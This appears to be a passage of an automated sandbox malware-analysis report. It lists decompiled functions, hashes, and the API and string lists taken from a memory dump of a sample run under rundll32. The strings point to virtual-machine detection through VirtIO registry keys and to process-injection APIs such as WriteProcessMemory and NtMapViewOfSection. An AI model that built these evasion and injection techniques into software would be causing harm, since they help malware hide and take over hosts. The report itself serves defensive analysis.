                                        • String ID: Checking reg key %s $SYSTEM\ControlSet001\Services\BALLOON$SYSTEM\ControlSet001\Services\BalloonService$SYSTEM\ControlSet001\Services\VirtIO-FS Service$SYSTEM\ControlSet001\Services\VirtioSerial$SYSTEM\ControlSet001\Services\netkvm$SYSTEM\ControlSet001\Services\vioscsi$SYSTEM\ControlSet001\Services\viostor
                                        • API String ID: 47109696-2595593112
                                        • Opcode ID: 5fcd67d3b96c9805d83ee532e5670651764c04fb282fe68a4cc2dfb8abe56a19
                                        • Instruction ID: 1f2c146057438ccfcd91868252aa2785fb9b30880611493884c0b551a3c46ba8
                                        • Opcode Fuzzy Hash: 5fcd67d3b96c9805d83ee532e5670651764c04fb282fe68a4cc2dfb8abe56a19
                                        • Instruction Fuzzy Hash: 6E316936255FC092FA508B15F484BCAB3A8F788780F50A127EEAD47B69DF38C215CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3388288C8 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E000001C31C3388288C8(void* __edx, char* __r8, void* __r9) {
				signed long long _t9;
				signed long long _t10;
				void* _t15;

				_t9 =  *0x38903000; // 0x9bfaf736ae76
				_t10 = _t9 ^ _t15 - 0x000000c0;
				 *(_t15 - 0x4f + 0x3f) = _t10;
				if (__r9 - _t10 + 4 >= 0) goto 0x38828914;
				 *__r8 = 0;
				E000001C31C33880C290();
				return 0xc;
			}






                                        0x1c3388288d6
                                        0x1c3388288dd
                                        0x1c3388288e0
                                        0x1c3388288f4
                                        0x1c3388288f6
                                        0x1c338828906
                                        0x1c338828913

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                        • API String ID: 3215553584-2617248754
                                        • Opcode ID: c27a961c99c4b90775e64e9477821c3fb21b6c96bf9c920cb1ab29b6d578e68f
                                        • Instruction ID: bc45d4e2e442a279b355d88914cb0c354b8d26810b72fce33bf1de91c3ef7da6
                                        • Opcode Fuzzy Hash: c27a961c99c4b90775e64e9477821c3fb21b6c96bf9c920cb1ab29b6d578e68f
                                        • Instruction Fuzzy Hash: 9E419C72741B8489FB14DF65E841BCD33A4F718788F40A526EEAC4BB95EE39C625C341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338717E30 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 66libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModuleProtectVirtual
                                        • String ID: SleepEx$UD3"$WriteProcessMemory$kernel32.dll
                                        • API String ID: 2492872976-2122506030
                                        • Opcode ID: f3b16c542549372e70ea8ee859f74782e9ac290f33c255a486bcc054e6462a3f
                                        • Instruction ID: bc33ae9f11ea448656c70683bf3542952d5fca31bbe4220393918502d7951df9
                                        • Opcode Fuzzy Hash: f3b16c542549372e70ea8ee859f74782e9ac290f33c255a486bcc054e6462a3f
                                        • Instruction Fuzzy Hash: D9216B76B01A808AFB21CF66E804ADD7B64F358BD8F445126DE5D1BB48DF38C6858B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C338703DD0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 66%
                                        			E000001C31C338703DD0(void* __ebx, void* __ecx, void* __edx, long long __rbx, intOrPtr* __rcx, long long* __rdx, long long __r8) {
				void* __rdi;
				void* __rsi;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;
				long long _t84;
				long long _t93;
				long long* _t98;
				intOrPtr _t101;
				long long _t117;
				void* _t126;
				long long _t129;
				void* _t130;
				long long _t131;
				intOrPtr* _t132;
				intOrPtr _t134;
				void* _t135;
				void* _t137;
				long long* _t142;
				long long _t145;

				_t65 = __edx;
				_t64 = __ecx;
				_t63 = __ebx;
				 *((long long*)(_t135 + 0x48)) = 0xfffffffe;
				 *((long long*)(_t135 + 0x168)) = __rbx;
				_t131 = __r8;
				_t142 = __rdx;
				_t98 = __rcx;
				_t101 =  *((intOrPtr*)(__rcx + 0x20));
				_t129 =  *((intOrPtr*)(__rcx + 0x10));
				if (__r8 - _t101 - _t129 > 0) goto 0x38703e20;
				 *((long long*)(__rcx + 0x18)) = _t129 + __r8;
				 *__rdx = _t129;
				 *((long long*)(__rdx + 8)) = __r8;
				goto 0x38703fea;
				_t130 = _t129 -  *((intOrPtr*)(__rcx + 8));
				if (__r8 - _t101 -  *__rcx - _t130 > 0) goto 0x38703e5d;
				if (_t130 == 0) goto 0x38703e45;
				_t137 = _t130;
				E000001C31C33880DC90(__ecx, _t66, _t67, _t68,  *__rcx,  *((intOrPtr*)(__rcx + 8)), _t130, __r8, _t137);
				_t84 =  *_t98;
				 *((long long*)(_t98 + 8)) = _t84;
				 *((long long*)(_t98 + 0x18)) = _t84 + _t130 + __r8;
				goto 0x38703fdf;
				_t132 = _t98 + 0x28;
				if (__r8 -  *_t132 - _t130 <= 0) goto 0x38703f22;
				 *((long long*)(_t135 + 0x20)) = 0x3889d200;
				 *((long long*)(_t135 + 0x28)) = 0x3889d200;
				 *((long long*)(_t135 + 0x30)) = 0x3889d200;
				 *((long long*)(_t135 + 0x38)) = "basic_flat_buffer overflow";
				 *((char*)(_t135 + 0x40)) = 1;
				E000001C31C33880E0E4(_t98, _t135 + 0x38, _t135 + 0x28, _t130, __r8);
				 *((long long*)(_t135 + 0x20)) = 0x3889d240;
				 *((long long*)(_t135 + 0x20)) = 0x3889d270;
				E000001C31C3386FE350(_t98, _t135 + 0xa8, _t135 + 0x20);
				 *0x1C33889D298 = "class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)";
				 *0x1C33889D2A0 = "D:\\Sources\\boost_1_68_0\\boost/beast/core/impl/flat_buffer.ipp";
				 *0x1C33889D2A8 = 0x105;
				E000001C31C3387012E0(0x3889d270, _t135 + 0xe8);
				E000001C31C338701320(_t63, _t98, _t135 + 0x50, 0x3889d270, _t131);
				E000001C31C3388103EC(_t98, _t135 + 0x50, 0x388e4b98, _t131);
				 *((long long*)(_t135 + 0x160)) = _t130 + _t137;
				 *((long long*)(_t135 + 0x170)) = _t130 + _t130;
				_t126 =  >=  ? _t135 + 0x170 : _t135 + 0x160;
				_t93 =  *_t132;
				_t133 =  <  ? _t126 : _t132;
				_t134 =  *((intOrPtr*)( <  ? _t126 : _t132));
				if (_t134 != 0) goto 0x38703f6a;
				r15d = 0;
				goto 0x38703fa0;
				if (_t134 - 0x1000 < 0) goto 0x38703f95;
				if (_t134 + 0x27 - _t134 > 0) goto 0x38703f82;
				E000001C31C33880A170(_t93);
				asm("int3");
				E000001C31C33880B674(_t93, _t134 + 0x27);
				_t38 = _t93 + 0x27; // 0x27
				 *((long long*)((_t38 & 0xffffffe0) - 8)) = _t93;
				goto 0x38703fa0;
				E000001C31C33880B674(_t93, _t134);
				_t145 = _t93;
				if ( *_t98 == 0) goto 0x38703fc4;
				E000001C31C33880DC90(_t64, _t66, _t67, _t68, _t145,  *((intOrPtr*)(_t98 + 8)), _t130, _t131, _t130);
				_t62 = E000001C31C3386E83F0(_t64, _t65, _t98,  *_t98,  *((intOrPtr*)(_t98 + 0x20)) -  *_t98);
				 *_t98 = _t145;
				 *((long long*)(_t98 + 8)) = _t145;
				_t117 = _t145 + _t130;
				 *((long long*)(_t98 + 0x18)) = _t117 + _t131;
				 *((long long*)(_t98 + 0x20)) = _t145 + _t134;
				 *((long long*)(_t142 + 8)) = _t131;
				 *_t142 = _t117;
				 *((long long*)(_t98 + 0x10)) = _t117;
				return _t62;
			}


























                                        0x1c338703dd0
                                        0x1c338703dd0
                                        0x1c338703dd0
                                        0x1c338703ddf
                                        0x1c338703de8
                                        0x1c338703df0
                                        0x1c338703df3
                                        0x1c338703df6
                                        0x1c338703df9
                                        0x1c338703dfd
                                        0x1c338703e0a
                                        0x1c338703e10
                                        0x1c338703e14
                                        0x1c338703e17
                                        0x1c338703e1b
                                        0x1c338703e24
                                        0x1c338703e33
                                        0x1c338703e38
                                        0x1c338703e3a
                                        0x1c338703e40
                                        0x1c338703e45
                                        0x1c338703e48
                                        0x1c338703e54
                                        0x1c338703e58
                                        0x1c338703e5d
                                        0x1c338703e6b
                                        0x1c338703e78
                                        0x1c338703e7f
                                        0x1c338703e84
                                        0x1c338703e90
                                        0x1c338703e95
                                        0x1c338703ea4
                                        0x1c338703eb1
                                        0x1c338703ebd
                                        0x1c338703ecf
                                        0x1c338703edc
                                        0x1c338703ee7
                                        0x1c338703eeb
                                        0x1c338703efd
                                        0x1c338703f0b
                                        0x1c338703f1c
                                        0x1c338703f26
                                        0x1c338703f32
                                        0x1c338703f4d
                                        0x1c338703f51
                                        0x1c338703f58
                                        0x1c338703f5c
                                        0x1c338703f63
                                        0x1c338703f65
                                        0x1c338703f68
                                        0x1c338703f71
                                        0x1c338703f7a
                                        0x1c338703f7c
                                        0x1c338703f81
                                        0x1c338703f82
                                        0x1c338703f87
                                        0x1c338703f8f
                                        0x1c338703f93
                                        0x1c338703f98
                                        0x1c338703f9d
                                        0x1c338703fa4
                                        0x1c338703fb0
                                        0x1c338703fbf
                                        0x1c338703fc4
                                        0x1c338703fc7
                                        0x1c338703fcb
                                        0x1c338703fd3
                                        0x1c338703fdb
                                        0x1c338703fdf
                                        0x1c338703fe3
                                        0x1c338703fe6
                                        0x1c338704003

                                        Strings
                                        • class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64), xrefs: 000001C338703ED5
                                        • basic_flat_buffer overflow, xrefs: 000001C338703E89
                                        • D:\Sources\boost_1_68_0\boost/beast/core/impl/flat_buffer.ipp, xrefs: 000001C338703EE0
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: D:\Sources\boost_1_68_0\boost/beast/core/impl/flat_buffer.ipp$basic_flat_buffer overflow$class boost::asio::mutable_buffer __cdecl boost::beast::basic_flat_buffer<class std::allocator<char> >::prepare(unsigned __int64)
                                        • API String ID: 0-1740500164
                                        • Opcode ID: 038e367d882b75aa0431399039ffe50f6ab25b771d27c9cdcc5c079fdbff2d8b
                                        • Instruction ID: dd567c61736b9e12724d5c55b34d75603442338c5cc11c471332430fa7b8d572
                                        • Opcode Fuzzy Hash: 038e367d882b75aa0431399039ffe50f6ab25b771d27c9cdcc5c079fdbff2d8b
                                        • Instruction Fuzzy Hash: 78518EB2241FC094EB21DF64E5847DE73A5F788B98F509226DAAD077A8DF38C255C341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C3386EFC60 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 24%
                                        			E000001C31C3386EFC60(long long _a8, long long _a16, long long _a24) {
				char _v40;
				long long _v48;
				long long _v56;
				intOrPtr _v64;
				long long _v72;
				intOrPtr _v80;
				long long _v88;
				long _t39;
				long long _t51;
				long long _t53;
				long long _t54;
				long long _t57;
				long long _t67;
				long long _t71;
				long long _t73;
				void* _t78;

				_v72 = 0xfffffffe;
				_a24 = _t53;
				_t54 = _t67;
				_t71 = _t57;
				_v48 = _t57 + 0x60;
				EnterCriticalSection(??);
				_v40 = 1;
				_t51 =  *((intOrPtr*)(_t71 + 0x88));
				 *((long long*)(_t54 + 8)) = _t51;
				 *((long long*)(_t71 + 0x88)) = _t54;
				if ( *((intOrPtr*)(_t71 + 0x50)) != _t73) goto 0x386efd28;
				r8d = 0;
				CreateWaitableTimerA(??, ??, ??);
				 *((long long*)(_t71 + 0x50)) = _t51;
				if (_t51 != 0) goto 0x386efcf2;
				_t39 = GetLastError();
				E000001C31C33880D880(_t57 + 0x60, _t67);
				_v64 = _t39;
				_v56 = _t51;
				if (_t39 == 0) goto 0x386efcf2;
				E000001C31C3386EE680("timer");
				asm("int3");
				_a8 = 0x4d2fa200;
				_v80 = 0;
				_v88 = _t73;
				r9d = 0;
				r8d = 0x493e0;
				SetWaitableTimer(??, ??, ??, ??, ??, ??);
				if ( *((intOrPtr*)(_t71 + 0x48)) != _t73) goto 0x386efdab;
				E000001C31C33880B674(0x4d2fa200,  *((intOrPtr*)(_t71 + 0x50)));
				_a8 = 0x4d2fa200;
				 *0xFFFFFFFF4D2FA208 = _t73;
				 *0xFFFFFFFF4D2FA210 = _t73;
				E000001C31C33880B674(0x4d2fa200,  *((intOrPtr*)(_t71 + 0x50)));
				_a16 = 0x4d2fa200;
				 *0x4d2fa200 = 0x388b1570;
				 *0x4d2fa200 = 0x388b1bb0;
				 *0xFFFFFFFF4D2FA218 = _t71;
				r8d = 0x10000;
				E000001C31C3386EEF50(0x4d2fa200, 0x4d2fa200, 0x4d2fa200, 0x4d2fa200, _t78);
				if ( *((intOrPtr*)(_t71 + 0x48)) == 0) goto 0x386efda7;
				CloseHandle(??);
				0x3880bdc8();
				 *((long long*)(_t71 + 0x48)) = 0x4d2fa200;
				return LeaveCriticalSection(??);
			}



















                                        0x1c3386efc68
                                        0x1c3386efc71
                                        0x1c3386efc79
                                        0x1c3386efc7c
                                        0x1c3386efc83
                                        0x1c3386efc8b
                                        0x1c3386efc91
                                        0x1c3386efc96
                                        0x1c3386efc9d
                                        0x1c3386efca1
                                        0x1c3386efcae
                                        0x1c3386efcb0
                                        0x1c3386efcb7
                                        0x1c3386efcbd
                                        0x1c3386efcc4
                                        0x1c3386efccc
                                        0x1c3386efcce
                                        0x1c3386efcd3
                                        0x1c3386efcd7
                                        0x1c3386efcde
                                        0x1c3386efcec
                                        0x1c3386efcf1
                                        0x1c3386efcfc
                                        0x1c3386efd04
                                        0x1c3386efd08
                                        0x1c3386efd0d
                                        0x1c3386efd10
                                        0x1c3386efd22
                                        0x1c3386efd2c
                                        0x1c3386efd33
                                        0x1c3386efd3b
                                        0x1c3386efd43
                                        0x1c3386efd47
                                        0x1c3386efd50
                                        0x1c3386efd55
                                        0x1c3386efd64
                                        0x1c3386efd6e
                                        0x1c3386efd71
                                        0x1c3386efd75
                                        0x1c3386efd81
                                        0x1c3386efd8e
                                        0x1c3386efd94
                                        0x1c3386efda2
                                        0x1c3386efda7
                                        0x1c3386efdbd

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TimerWaitable$CloseCreateCriticalEnterErrorExceptionHandleInit_thread_footerLastSectionThrow__std_exception_copy
                                        • String ID: timer
                                        • API String ID: 1177437407-1792073242
                                        • Opcode ID: 569b81e12f945619493bd48da6d215cc9a7284f26144e8d236e8c08901ac4815
                                        • Instruction ID: 14be5296d15dfe7b16833fa1b338cb30f8380e70da8f937d5d9dfb0fe9125170
                                        • Opcode Fuzzy Hash: 569b81e12f945619493bd48da6d215cc9a7284f26144e8d236e8c08901ac4815
                                        • Instruction Fuzzy Hash: 52317C32241BC086FB649F25E840BD973A4FB84B90F54922ADFA94BB95DF38D664C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33872E960 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 129encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Cert$Certificate$ContextPropertyStore$CertificatesEnumFind
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$capi_cert_get_fname
                                        • API String ID: 1407214842-2690582526
                                        • Opcode ID: 77d0f3dfedcc36c35fb8292c1e144379b79b8c0813163f59157cd21200c65742
                                        • Instruction ID: a69e60a1c98ec0479bd75c7459810db6934918a578998fb00168092057d6988c
                                        • Opcode Fuzzy Hash: 77d0f3dfedcc36c35fb8292c1e144379b79b8c0813163f59157cd21200c65742
                                        • Instruction Fuzzy Hash: 0741C6333907D046FA50DB62E804FE667A2B749BD4F48E023DD6947B96DA39C745CB02
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33871B9B0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 50%
                                        			E000001C31C33871B9B0(long long* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, char _a32) {
				void* _v24;
				char _v40;
				intOrPtr _v48;
				signed int _v56;
				intOrPtr _v64;
				long long _v72;
				long long _v80;
				signed long long _v88;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t48;
				void* _t54;
				void* _t59;
				WCHAR* _t61;

				_t59 = _t54;
				 *((long long*)(_t59 + 8)) = __rbx;
				 *((long long*)(_t59 + 0x10)) = __rbp;
				 *(_t59 - 0x28) =  *(_t59 - 0x28) & 0x00000000;
				 *(_t59 + 0x20) =  *(_t59 + 0x20) & 0x00000000;
				 *((intOrPtr*)(_t59 + 0x24)) = 0;
				GetModuleHandleW(_t61);
				GetProcAddress(_t45);
				GetProcAddress(_t48);
				_v48 = 0x40;
				r9d = 0;
				_v56 = _v56 & 0x00000000;
				_v64 = 2;
				_v72 =  &_v40;
				_v80 =  &_a32;
				_v88 = _v88 & 0x00000000;
				 *__rax();
				return  *__rax();
			}
















                                        0x1c33871b9b0
                                        0x1c33871b9b3
                                        0x1c33871b9b7
                                        0x1c33871b9c3
                                        0x1c33871b9cb
                                        0x1c33871b9dc
                                        0x1c33871b9e3
                                        0x1c33871b9f6
                                        0x1c33871ba09
                                        0x1c33871ba0f
                                        0x1c33871ba17
                                        0x1c33871ba1a
                                        0x1c33871ba22
                                        0x1c33871ba2f
                                        0x1c33871ba42
                                        0x1c33871ba4a
                                        0x1c33871ba50
                                        0x1c33871ba6a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule
                                        • String ID: @$NtMapViewOfSection$RtlNtStatusToDosError$ntdll.dll
                                        • API String ID: 667068680-1608534789
                                        • Opcode ID: b2b9b886758cbfbfa2d1ecb312041d743efba4d65bf52864f5adb2240458c07b
                                        • Instruction ID: 3bd9cb056c0e53d729811d441e993cfa96726c390991d372102744353f862aad
                                        • Opcode Fuzzy Hash: b2b9b886758cbfbfa2d1ecb312041d743efba4d65bf52864f5adb2240458c07b
                                        • Instruction Fuzzy Hash: AF114632214B808AEB109F12F848B9977A4F38CBA5F558136DE6D87714EB79C689CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 000001C33882A6E4 Relevance: 10.8, APIs: 7, Instructions: 294COMMONLIBRARYCODE
                                        Download Yara Rule
                                        C-Code - Quality: 79%
                                        			E000001C31C33882A6E4(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
				void* __rsi;
				void* _t118;
				unsigned int _t135;
				void* _t139;
				void* _t142;
				void* _t145;
				char _t154;
				char _t155;
				char _t156;
				long long _t186;
				long long _t220;
				intOrPtr _t221;
				signed short* _t235;
				signed int* _t238;
				char* _t241;
				signed short* _t250;
				signed long long _t255;
				signed long long _t256;
				signed long long _t261;
				void* _t263;
				signed short* _t264;
				long _t270;
				DWORD* _t272;
				signed long long _t274;
				void* _t276;
				void* _t277;
				long long _t279;
				signed short* _t281;
				signed short* _t288;
				void* _t292;
				void* _t294;
				void* _t297;
				void* _t299;
				char* _t301;
				char* _t302;
				char* _t303;

				_t279 = __r8;
				_t145 = __ebx;
				 *((long long*)(_t276 + 0x18)) = __rbx;
				 *((long long*)(_t276 + 0x10)) = __rdx;
				_t277 = _t276 - 0x60;
				r12d = r8d;
				if (r13d != 0xfffffffe) goto 0x3882a725;
				E000001C31C338818964(__rax);
				 *__rax = 0;
				E000001C31C338818984(__rax);
				 *__rax = 9;
				goto 0x3882ab2e;
				if (__ecx < 0) goto 0x3882ab17;
				if (r13d -  *0x3890b120 >= 0) goto 0x3882ab17;
				_t3 = _t270 + 1; // 0x1
				r8d = _t3;
				 *((long long*)(_t277 + 0x48)) = __r8;
				_t274 = __ecx << 6;
				_t255 = __ecx >> 6;
				 *(_t277 + 0x40) = _t255;
				_t220 =  *((intOrPtr*)(0x3890ad20 + _t255 * 8));
				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x3882ab17;
				if (r12d - 0x7fffffff <= 0) goto 0x3882a791;
				E000001C31C338818964(_t220);
				 *_t220 = 0;
				E000001C31C338818984(_t220);
				 *_t220 = 0x16;
				goto 0x3882ab29;
				if (r12d == 0) goto 0x3882ab13;
				if (( *(_t220 + _t274 + 0x38) & 0x00000002) != 0) goto 0x3882ab13;
				_t186 = __rdx;
				if (_t186 == 0) goto 0x3882a77a;
				r10d =  *((char*)(_t220 + _t274 + 0x39));
				 *((long long*)(_t277 + 0x38)) =  *((intOrPtr*)(_t220 + _t274 + 0x28));
				 *((intOrPtr*)(_t277 + 0xa0)) = r10b;
				if (_t186 == 0) goto 0x3882a7ec;
				if (_t186 != 0) goto 0x3882a7e1;
				if ((r8b &  !r12d) == 0) goto 0x3882a7f6;
				r14d = r12d;
				goto 0x3882a88c;
				if ((r8b &  !r12d) != 0) goto 0x3882a812;
				E000001C31C338818964(_t220);
				 *_t220 = 0;
				_t118 = E000001C31C338818984(_t220);
				 *_t220 = 0x16;
				E000001C31C338811BC8(_t118);
				goto 0x3882a998;
				r14d = r12d;
				r14d = r14d >> 1;
				r14d =  <  ? 4 : r14d;
				E000001C31C338822878(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				_t241 = _t220;
				E000001C31C338824EE0(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				E000001C31C338824EE0(_t220,  *((intOrPtr*)(_t220 + _t274 + 0x28)));
				_t301 = _t241;
				if (_t241 != 0) goto 0x3882a85b;
				E000001C31C338818984(_t220);
				 *_t220 = 0xc;
				E000001C31C338818964(_t220);
				 *_t220 = 8;
				goto 0x3882a998;
				_t26 = _t255 + 1; // 0x1
				r8d = _t26;
				E000001C31C33882AE90(r13d, _t241, _t241, _t255, _t270, _t299, _t297);
				_t256 =  *(_t277 + 0x40);
				r10b =  *((intOrPtr*)(_t277 + 0xa0));
				r8d = 1;
				 *((long long*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x30)) = _t220;
				_t221 =  *((intOrPtr*)(0x3890ad20 + _t256 * 8));
				 *((long long*)(_t277 + 0x50)) = _t301;
				r9d = 0xa;
				if (( *(_t221 + _t274 + 0x38) & 0x00000048) == 0) goto 0x3882a921;
				_t154 =  *((intOrPtr*)(_t221 + _t274 + 0x3a));
				if (_t154 == r9b) goto 0x3882a921;
				if (r14d == 0) goto 0x3882a921;
				 *_t301 = _t154;
				r14d = r14d - 1;
				_t302 = _t301 + _t279;
				 *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3a)) = r9b;
				if (r10b == 0) goto 0x3882a921;
				_t155 =  *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3b));
				if (_t155 == r9b) goto 0x3882a921;
				if (r14d == 0) goto 0x3882a921;
				 *_t302 = _t155;
				_t303 = _t302 + _t279;
				r14d = r14d - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3b)) = r9b;
				if (r10b != r8b) goto 0x3882a921;
				_t156 =  *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3c));
				if (_t156 == r9b) goto 0x3882a921;
				if (r14d == 0) goto 0x3882a921;
				 *_t303 = _t156;
				r14d = r14d - 1;
				 *((intOrPtr*)( *((intOrPtr*)(0x3890ad20 + _t256 * 8)) + _t274 + 0x3c)) = r9b;
				if (E000001C31C3388340B4(r13d, 0,  *((intOrPtr*)(0x3890ad20 + _t256 * 8))) == 0) goto 0x3882a9b6;
				if (( *( *(0x3890ad20 +  *(_t277 + 0x40) * 8) + _t274 + 0x38) & 0x00000080) == 0) goto 0x3882a9b6;
				if (GetConsoleMode(_t294) == 0) goto 0x3882a9b6;
				if ( *((char*)(_t277 + 0xa0)) != 2) goto 0x3882a9bb;
				r14d = r14d >> 1;
				r8d = r14d;
				 *(_t277 + 0x20) = _t270;
				if (ReadConsoleW(_t292, _t263, _t270, _t272) != 0) goto 0x3882a9aa;
				E000001C31C338818914(GetLastError(),  *(0x3890ad20 +  *(_t277 + 0x40) * 8), _t241);
				E000001C31C338824EE0( *(0x3890ad20 +  *(_t277 + 0x40) * 8), _t241);
				goto 0x3882ab31;
				goto 0x3882a9f6;
				 *((intOrPtr*)(_t277 + 0x48)) = sil;
				r8d = r14d;
				 *(_t277 + 0x20) = _t270;
				if (ReadFile(??, ??, ??, ??, ??) == 0) goto 0x3882aadd;
				if ( *((intOrPtr*)(_t277 + 0xb8)) - r12d > 0) goto 0x3882aadd;
				if (( *( *(0x3890ad20 +  *(_t277 + 0x40) * 8) + _t274 + 0x38) & 0x00000080) == 0) goto 0x3882a99b;
				if ( *((char*)(_t277 + 0xa0)) == 2) goto 0x3882aa3f;
				_t261 = _t303 + _t279;
				 *(_t277 + 0x20) = _t292 >> 1;
				_t135 = E000001C31C33882A2CC(_t145, r13d, _t263 +  *(0x3890ad20 +  *(_t277 + 0x40) * 8) * 2 +  *((intOrPtr*)(_t277 + 0xb8)), _t261, _t263 +  *(0x3890ad20 +  *(_t277 + 0x40) * 8) * 2 +  *((intOrPtr*)(_t277 + 0xb8)),  *((intOrPtr*)(_t277 + 0xa8)));
				goto 0x3882a99b;
				if (_t135 == 0) goto 0x3882aac5;
				_t281 =  *((intOrPtr*)(_t277 + 0x50));
				_t250 = _t281;
				_t264 = _t281;
				_t288 =  &(_t281[_t135 >> 1]);
				if (_t281 - _t288 >= 0) goto 0x3882aab8;
				_t235 =  &(_t281[1]);
				r9d =  *_t250 & 0x0000ffff;
				if (r9w == 0x1a) goto 0x3882aaaf;
				if (r9w != 0xd) goto 0x3882aa98;
				if (_t235 - _t288 >= 0) goto 0x3882aa98;
				if ( *_t235 != 0xa) goto 0x3882aa98;
				 *_t264 = 0xa;
				goto 0x3882aaa8;
				_t264[1] = r9w;
				if ( &(_t250[3]) - _t288 < 0) goto 0x3882aa6b;
				goto 0x3882aab8;
				_t238 =  *((intOrPtr*)(0x3890ad20 + _t261 * 8));
				 *(_t238 + _t274 + 0x38) =  *(_t238 + _t274 + 0x38) | 0x00000002;
				goto 0x3882a99b;
				E000001C31C33882A09C(r13d, _t135 + _t135,  *((intOrPtr*)(_t277 + 0x50)), _t135 + _t135 >> 1);
				goto 0x3882aa38;
				if (GetLastError() != 5) goto 0x3882ab03;
				E000001C31C338818984(_t238);
				 *_t238 = 9;
				_t139 = E000001C31C338818964(_t238);
				 *_t238 = 5;
				goto 0x3882a998;
				if (_t139 != 0x6d) goto 0x3882a991;
				goto 0x3882a99b;
				goto 0x3882ab31;
				E000001C31C338818964(_t238);
				 *_t238 = 0xa;
				_t142 = E000001C31C338818984(_t238);
				 *_t238 = 9;
				return E000001C31C338811BC8(_t142) | 0xffffffff;
			}







































                                        0x1c33882a6e4
                                        0x1c33882a6e4
                                        0x1c33882a6e4
                                        0x1c33882a6e9
                                        0x1c33882a6f9
                                        0x1c33882a703
                                        0x1c33882a70a
                                        0x1c33882a70c
                                        0x1c33882a713
                                        0x1c33882a715
                                        0x1c33882a71a
                                        0x1c33882a720
                                        0x1c33882a729
                                        0x1c33882a736
                                        0x1c33882a73f
                                        0x1c33882a73f
                                        0x1c33882a746
                                        0x1c33882a74e
                                        0x1c33882a752
                                        0x1c33882a75d
                                        0x1c33882a762
                                        0x1c33882a76b
                                        0x1c33882a778
                                        0x1c33882a77a
                                        0x1c33882a77f
                                        0x1c33882a781
                                        0x1c33882a786
                                        0x1c33882a78c
                                        0x1c33882a794
                                        0x1c33882a79f
                                        0x1c33882a7a5
                                        0x1c33882a7a8
                                        0x1c33882a7b2
